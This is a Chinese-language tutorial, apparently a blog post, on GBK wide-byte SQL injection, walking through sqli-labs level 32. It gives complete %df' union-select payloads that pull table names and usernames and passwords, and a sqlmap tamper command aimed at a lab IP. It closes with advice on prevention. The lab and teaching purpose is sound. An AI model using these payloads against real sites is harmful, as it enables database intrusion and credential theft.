目录
什么是宽字节?
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节
- 像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节,也就是只有两字节
- 英文默认占一个字节,中文占两个字节
宽字节注入原理
简单来说,宽字节注入就是将两个ascii字符误认为是一个宽字节字符。
宽字节注入是利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ascii码要大于128,才到汉字的范围)
GBK首字节对应0×81-0xFE,尾字节对应0×40-0xFE(除0×7F),例如%df和%5C会结合;GB2312是被GBK兼容的,它的高位范围是0xA1-0xF7,低位范围是0xA1-0xFE(0x5C不在该范围内),因此不能使用编码吃掉%5c
通常我们sql注入会输入id=1'或id=1''进行测试,如果数据库过滤不严格就会产生报错,宽字节注入会在 ' 前加入 \,加入反斜线之后,起到一个转义作用,这样,存在的 ' 就会失去注入的功能。
我们利用宽注入的原理,输入id=1%df',页面就会发生报错,这是因为GBK编码认为一个汉字占两个字节,\的url编码是%5C,加上 %df ,前面两个字符就会拼接为 %df%5c被识别为一个汉字。这样,\自动消失,转义作用在此失效。重新构造出来的汉字叫
是真实存在但是浏览器不能很好识别的一个汉字。
理论上可以不一定要使用%df,像%81 、%a1经测试也是可以实现的,只要能够重新构造出一个真实存在且不能被浏览器很好识别的汉字,并且编码能够包含%5c使\失效的字符都可以。
常用URL编码
’ ——> %27
空格 ——> %20
#符号 ——> %23
\ ——> %5C
sqli-labs实例
以sqli-labs的第32关为例
输入?id=1',发现'前面加上了\,被转义
输入?id=1%df',页面报错
判断是否存在漏洞
?id=1%df' and 1 --+
?id=1%df' and 0 --+
判断列数及回显
?id=1%df' order by 3 --+ (经过试验得知列数为3)
?id=-1%df' union select 1,2,3 --+
获取数据
库名:?id=-1%df' union select 1,database(),3 --+
表名:?id=-1%df' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
列名: ?id=-1%df' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)--+
因为不能出现单引号,于是我们在users前面加入0x,然后将users转化为16进制
字段值:?id=-1%df' union select 1,2,(select group_concat(username,password) from security.users)--+
还在别人的博客里看见了用sqlmap实现宽字节注入。(我还没尝试过)
使用
unmagicquotes.py脚本即可。执行:sqlmap -u http://192.168.15.146/sqli-labs-master/Less-32/?id=1 --tamper unmagicquotes.py
宽字节注入的预防
- 先调用mysql_set_charset函数设置连接使用的字符集为gbk,再调用mysql_real_escape_string函数对用户的输入进行转义(该函数比addslashes函数安全)
- 这样当用户输入%df' 即 %df%5c 时 mysql 就会把他直接编码为 運 ,mysql_real_escape_string函数是不会对%5c再添加%5c进行转义的。这样就预防住宽字节注入了。
6497
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
